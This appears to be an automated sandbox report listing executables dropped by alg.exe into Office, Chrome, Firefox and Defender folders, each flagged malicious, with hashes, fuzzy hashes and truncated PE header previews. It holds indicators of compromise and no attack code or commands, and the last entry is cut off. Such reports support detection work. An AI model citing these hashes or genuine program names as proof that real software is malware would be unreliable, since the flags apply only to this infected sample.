Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1388544
Entropy (8bit):	5.272929603786885
Encrypted:	false
SSDEEP:	12288:owkNKiZ+R2GGNUbTF5PXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:ozNKUE5PsqjnhMgeiCl7G0nehbGZpbD
MD5:	31E4E61AFB78D581BBECF1FED46D51F8
SHA1:	7CA1D5BFAA0DDEA81B5426871D1F6AF7F72D12FB
SHA-256:	320A6A122DBDC3A2FACF8EBF26AE358C4A749688A9799373ED4EA9520E9C5F99
SHA-512:	DDD70A2752C34DA0B0CD731913D7273B0DCC266D6B03DE787DD6C9E92296DA5AADCE894077C00F1F209A81E635A45B96DFF7B88F59C5C39AAEE8ECF7F3CBA076
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P......z..... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5855744
Entropy (8bit):	6.574328200316368
Encrypted:	false
SSDEEP:	98304:JALuzDKnxCp3JKNrPJzruaI6HMaJTtGbGD527BWG:yaGg3cFPIaI6HMaJTtGbGVQBWG
MD5:	1161796E523F6AE265B56D73FDC2A6CC
SHA1:	35B232FA23F52DE7F8166C70E86C2A1D123E1484
SHA-256:	765017A13F3983CFAB3BC279E6237C397A73D7128AAEBC8008158A6649E4C1BF
SHA-512:	6311E6860E2DCF01B1FA6D9522A7D71BF3D906D8291F8D9E2912030564BA0EE2A4ABC9CE9E016D60A6309FAA740302975D9A92D2436C48AFD590FAF739C7E24C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1312768
Entropy (8bit):	5.356062391301399
Encrypted:	false
SSDEEP:	24576:pXr/SVMxWcsqjnhMgeiCl7G0nehbGZpbD:F1x9Dmg27RnWGj
MD5:	BA00E65ABA55B22C0561516FFEEE848C
SHA1:	B9191A0EA9B2E1B86BF656929615E1AB64531D5D
SHA-256:	58D8E3EB9C60B6C5CB8736F6AFBA25FCD6A070EB659B631E03CB9F00607F1684
SHA-512:	21DB15A0307D4D229254B98CEA64F1A5DC2F60D59D97F9F2DBED374FF1B17877976479ED6D84A7510978ED5D42FC896058D976290BE316D810D763311A808412
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P................... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27533312
Entropy (8bit):	6.248635815762475
Encrypted:	false
SSDEEP:	196608:3hRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOSVQBWG:3hRCpGpMJMrbp8JjpNdNlc5aB
MD5:	6AD775B40597816F69B578F803AFDC44
SHA1:	EF7E9568CEA83B8215DE957F5C826EB8B686ECB3
SHA-256:	747E1488F999EB3263CD7D940DBCA5DC6E930039492C7B77546CC148FF51B954
SHA-512:	46BCC760F8ACDE04B5F4BD449F2321EA56C20976C6D30642ABE661BFF749BB236FBB065D3C27D846473A080C16AC748888089884806B653013EA894EDE2BD4B3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.\|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@....................................Q..... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2199552
Entropy (8bit):	6.788995825754547
Encrypted:	false
SSDEEP:	49152:d83pZ3kd0CuEeN0LUmRXzYs65maDmg27RnWGj:9KuUQY15pD527BWG
MD5:	86B870A81641714DFD9421B7F79DAB9F
SHA1:	F15F842E5F668BFE102BB72F63860098661027DD
SHA-256:	ACF31E179B41F3DF17C1454039AB0E305D9F8C9E2D7557E17B0070D2C93C2D80
SHA-512:	427C5F890BD6F455926BFE6B2B16186ED778A21A0C1EACF8D12635F17032A3E72D01569A2DE70FC9213A9F691D5B79209A370AF2BFE2883129C84429B48A3AF6
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.......!... .......... ......................................P...\|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4971008
Entropy (8bit):	6.670826793701705
Encrypted:	false
SSDEEP:	49152:1Erw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MZ:jA4oGlcR+glEdOPKzgVZoD527BWG
MD5:	9D314F6EE9BCA0288BA347E00BA9D9A9
SHA1:	5F6D52CAB57CEF037BF2F898B9FAFCDD722FF601
SHA-256:	8650806409F6039309E8BFC22867CE8B2767EAE646751CAE38C15F73BFD1A6CE
SHA-512:	66A0923D4B16A8688C8C477F85CE6B2705CC97BAFC3AF545205679611A9AD790992124670DE29DE497858E7CF0576770358EF0647EAABF78B135F32D7C4900FB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L....../L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.829758034634933
Encrypted:	false
SSDEEP:	49152:B8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKS:8v2gM+qwXLg7pPgw/DSZHqD527BWG
MD5:	D3A0D9CE5C129A9AB0098D43A8ABBE77
SHA1:	F3941BCC225787A8DAEEC2E3F28F3C71E5CC9724
SHA-256:	D9C9E49282F62E1BFF508CD64F990DAE9C6AAB71D8AD64053CBB943DB0846419
SHA-512:	E9C55BC5C3CC308345DF8417BA5D9B90A8767C95DFA616AE09439B94E60A118FA3605830F3CF29E0BEC0DA709F8DAF34E8EB1D05E178C42A46086F2292331DC4
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.829759685833738
Encrypted:	false
SSDEEP:	49152:r8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKS:qv2gM+qwXLg7pPgw/DSZHqD527BWG
MD5:	541A5868B4ADB3291923AD419572EC0A
SHA1:	0589272340B18CFDAE6FD5BD81CCB3AB3292DFA1
SHA-256:	84F45B82FA401C77671E77F6D5E68DDFEEA469C6EDF7F2F9FDD8C5857D4FC369
SHA-512:	1717CEAF2EA7F405E36B3674AF5C85211CE7A4D3059603EAEB5817B99DD001B0AC343D8D89520AC63DF6CE1B6804697FDD4F17D74E7BA8CC73EFA500262B8C66
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2156544
Entropy (8bit):	6.9535748497110905
Encrypted:	false
SSDEEP:	24576:ItjqL8fH+8aUbp8D/8+xyWAtsqjnhMgeiCl7G0nehbGZpbD:kjKK+81FI/8zvDmg27RnWGj
MD5:	505A3585005FE178FDFC8CD0BAB91690
SHA1:	428E25086C568A8E380BCC35AA7C22759C57B8C5
SHA-256:	BDFE785E92510E2A0A8DFE065E105B7F00A7B6D6BD6404312DF0869D1C615BF6
SHA-512:	ED6FC59F1082D8F3F226BDD99EDA7D08B36A10D9E7D88BAA276F1EFAF61AD812653A7F6BF28523C2D37C5EBABD421B4BA6B82FC48EA8BE567F833DED66C3BB27
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......F.....................@.............................P".......!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2370560
Entropy (8bit):	7.032385119473052
Encrypted:	false
SSDEEP:	49152:SAMsOu3JfCIGnZuTodRFYKBrFDbWphDmg27RnWGj:SAMa38ZuTSoD527BWG
MD5:	8A4A0C90C622D8841E496F8208908595
SHA1:	2C310F32E5E21BC5495FFF160BF12C618B7511CB
SHA-256:	050C9F0E4C73531BC1BDB12516585411B676296BC0017E138B6CB4F4AC310C74
SHA-512:	AA9BEF3E15D08F38A6A6DD1DCA197F1FB66DBD5238A296B9605ABC2E0AD76FCDB6AFF2AC1C5DDC68A4FDC0EA71A59D6C971E677A4F67CE40334BE0E1158CE022
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e..........".................0..........@..............................%.....Qf$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1984512
Entropy (8bit):	7.104324018482898
Encrypted:	false
SSDEEP:	24576:GwbK7tnhD4aH6wD2Krx5NgOOagQE8JpsqjnhMgeiCl7G0nehbGZpbD:GSK7Fhslq2EPfOGEEDmg27RnWGj
MD5:	CE0DDFD15AA9F0B8D821C9F01E3D195A
SHA1:	B5458AA303D91E807026F2694B8F3EFF3FA5C10C
SHA-256:	173367EFB7A2E86B38E5C37B8E2498DCBA8311E77E0DD2618A8E5662EEE489A9
SHA-512:	1F07F43BE5207C05B9A89585E483E528FD4F6E2053EADB02B493D4E2A271591FB6DC4F6470115CDD8E0EDF2FF93164C934F7CBAB3F9BD286745285F3381178BD
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."............................@....................................J..... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1779712
Entropy (8bit):	7.158046513258954
Encrypted:	false
SSDEEP:	24576:fKI7Twj5KDHxJ1FxyD+/wsG18bbQ5sqjnhMgeiCl7G0nehbGZpbD:fv7e0j31mD+/wDGbODmg27RnWGj
MD5:	02EECF10E9F20C87FD85B0C13C4280EF
SHA1:	9A5C137CAB37F10A5A8AF4EBC260BBDF989C9DD0
SHA-256:	047F777F34E0B7FC277E5E57820278016B3B684DE6C9D1F25189B708E0FE5B79
SHA-512:	B05F0DB07CF215136D763BE6E0E921E4F9B02B17227F797BEDD5658367821F75129B21016F6F14A398E677E7A3EEBC346E1DE2DAA0A3101A2464C611B34EE984
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."..........B.................@....................................q..... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).........................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.....................@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

C:\Program Files\Mozilla Firefox\crashreporter.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1378304
Entropy (8bit):	5.377427436718567
Encrypted:	false
SSDEEP:	12288:VQUVPDHhSWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:+yhSWsqjnhMgeiCl7G0nehbGZpbD
MD5:	B61CC70B671A164D81AA4A48FA86A6C6
SHA1:	6DB43200427E2B5789507E89C7EE95AD227B7820
SHA-256:	145C516B341B90A134DD1FEB6E223DCA206BEB74B145887D848BFDD19B66ED05
SHA-512:	8E176201E93F0581A8311EB186D0B175525DB52AD32856E8B6BE5644391DF0B84ECD6830087DAC8F7AB10105CF30CD4DCF46913AF79F2002FBFDD5480EBF2011
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p............ ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\default-browser-agent.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1286656
Entropy (8bit):	7.222095903650858
Encrypted:	false
SSDEEP:	24576:asFfc1VyFn5UQn652bO4HhsqjnhMgeiCl7G0nehbGZpbD:asFcIn5rJrDmg27RnWGj
MD5:	12D6F0A9830028B7E66BE5DAC4820C4D
SHA1:	675552022CA484DF99F4BA5EED53B51D0776C6B9
SHA-256:	A252170C4C89266848E95A64244C2780B0000C18378C22E1C5CA5DF1869E2505
SHA-512:	8DFDC0B62D45628131637D7EB14C486BF750AADA98412B603E5A6E5171B31877190687E723C9D9E2D91A56FF07C7379466A79EB6BA6ED7E0B5E5582CFFF8AC28
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\firefox.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1246208
Entropy (8bit):	7.494258261297835
Encrypted:	false
SSDEEP:	24576:st9o6p4xQbiKI69wpemIwpel9SsqjnhMgeiCl7G0nehbGZpbD:st9faQbtl2peapelsDmg27RnWGj
MD5:	49454438F1D587865956769494D93DC1
SHA1:	F930A85FC9C4C1959B5BBFA2DFA295C8B3726C50
SHA-256:	0212321F422F0D1EC8F97BB235E94FCC298FAC280580465297EA1C52D027799B
SHA-512:	8A1BCB3A56FD215D89111631523696DE2295845EDB9AD34CCFDEDFA0D79E9637D4E2B544016499DA10E438C99BB7F68A72A7639D28A7E931E11BC4A590EA60CC
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@....................................:c.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\maintenanceservice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1356800
Entropy (8bit):	5.347819668560054
Encrypted:	false
SSDEEP:	24576:yQVTZu0J5sqjnhMgeiCl7G0nehbGZpbD:hVTZu8Dmg27RnWGj
MD5:	D90A57CF0D1787FB8F9B7B447AF182A2
SHA1:	6540097E4BE245781940F0A08EB37BD64D5E7B2B
SHA-256:	DFA142F9345AAE55585ADDD733AEB199F6B9FB8CC5EDDF865847D96838B041EB
SHA-512:	4AD9DBC11D362B5DE4E61284BCD586356B52117482F7D5867AE653B692434C57AB04356EEED9E29524B49454ED8F2E95195482EF454D92B1F88C2987FFD3B1D1
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1344000
Entropy (8bit):	6.808360070799947
Encrypted:	false
SSDEEP:	24576:iC1vpgXcZHznsqjnhMgeiCl7G0nehbGZpbD:iC1vpIcN7Dmg27RnWGj
MD5:	297933B355ABA1E53F68EFC231A6386A
SHA1:	695D8B6425DC2DCAC2AAE9780EBE7D87D4EC88C7
SHA-256:	A51AA35B85399C9D77CABD92571EE77A3DAA250119320FF132F51DB4B7C7C579
SHA-512:	7109A52965E3EF4942F34C39E69E4EF3976FD20448099A65B7025ED18FD2D9E4DB3098EEB8B834D46076B007DD85EDE47815B8C9BD953042A7CF2EA5010AB35D
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@....................................S4.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\pingsender.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1200128
Entropy (8bit):	5.1400189271791925
Encrypted:	false
SSDEEP:	12288:WSwjzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WvzsqjnhMgeiCl7G0nehbGZpbD
MD5:	92079A077C142BFACE56AECDF727B484
SHA1:	ED2F6C3EF7F14097D93359FFA69BBA7418D3143F
SHA-256:	1A30EA737E226ADFA43E69BAED5BB9480EA94A832159CFBEE0153C99A4002A7B
SHA-512:	162DC6669DDA5770818159B0CF2BA5745EB7A89B9B5972B1FF0E4F9D1BAAA71D1BB97FCC16CF12707781F191F2420611DB617145ACD423326E54893333DF70F4
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\plugin-container.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1408512
Entropy (8bit):	5.441132768738115
Encrypted:	false
SSDEEP:	24576:lWKntIfGppsqjnhMgeiCl7G0nehbGZpbD:c8IezDmg27RnWGj
MD5:	A1D08422F5FF56DDD01CEEEE93194677
SHA1:	0D8A04BD8B2440939F743BF1D5E59A9CC9E28AAA
SHA-256:	63212AE31E878B926FA4C74520FCD616FEECF4CF1A215CC516E9713B880EC29D
SHA-512:	C9D4B160E43BA601683C211AF7D65C469A1014C260D2A3957434A01CC8199352BC0FEF79EB8FD8FB06D703C208A3BA3A8766AB26F20BF26D6D0CE1FA692E9B70
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.......................................... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\private_browsing.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1185280
Entropy (8bit):	5.103279363224864
Encrypted:	false
SSDEEP:	12288:hIhvXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cvsqjnhMgeiCl7G0nehbGZpbD
MD5:	41DA626D334F93BAFBD9C9BD0720FBEB
SHA1:	FEED7FC716CC964CB5983CE34C898A0E8BCEC07B
SHA-256:	89C17130283EB8F6C805E02BCC153281B6937A8607E9C690A1856B46FDD12B26
SHA-512:	04637976B51E0A881F2F3403A616388F2F73EC4158A2C0FE417C6F8DFF29F73FE3BD72DF3E83E480D12E86E006001FC22C956187AB43243ED37B3F5DF1125608
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................'..... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\updater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1531904
Entropy (8bit):	5.421190387144139
Encrypted:	false
SSDEEP:	24576:R8oREwt2ioQ3J+RCsqjnhMgeiCl7G0nehbGZpbD:R8oRpoFGDmg27RnWGj
MD5:	C71BDEBED07908EAB4B532903C71EEEC
SHA1:	115B3E2A53E14D56CE4538DC9A4E80F3E9B4D1AB
SHA-256:	0203734D2E1F99F8CB3AC1E96A718E56C4650A058D63A76F3D367CFC262235CB
SHA-512:	7C26A4A6859437AB724AFEB92BF05920F19066FC53768C2C23CC57D10A373C70A72EE31A6252BA7EB59D75B85BEEA1DE8A12F29C06E64A4CB9603242E7873FF9
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@....................................Q..... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1341952
Entropy (8bit):	5.238609647089159
Encrypted:	false
SSDEEP:	24576:Rf8HQlDMxHwJ07wMsqjnhMgeiCl7G0nehbGZpbD:RkHQlqwJ0zDmg27RnWGj
MD5:	9C2009343218AA6D592CCAF0BD45A429
SHA1:	63D3D3FF407EBF602D9DAD4B7EC8F0568E024EFD
SHA-256:	74C3558FE18DD352AB51C553F1AB4F1ECBFE9D3886E7D4475F056A419415C8B6
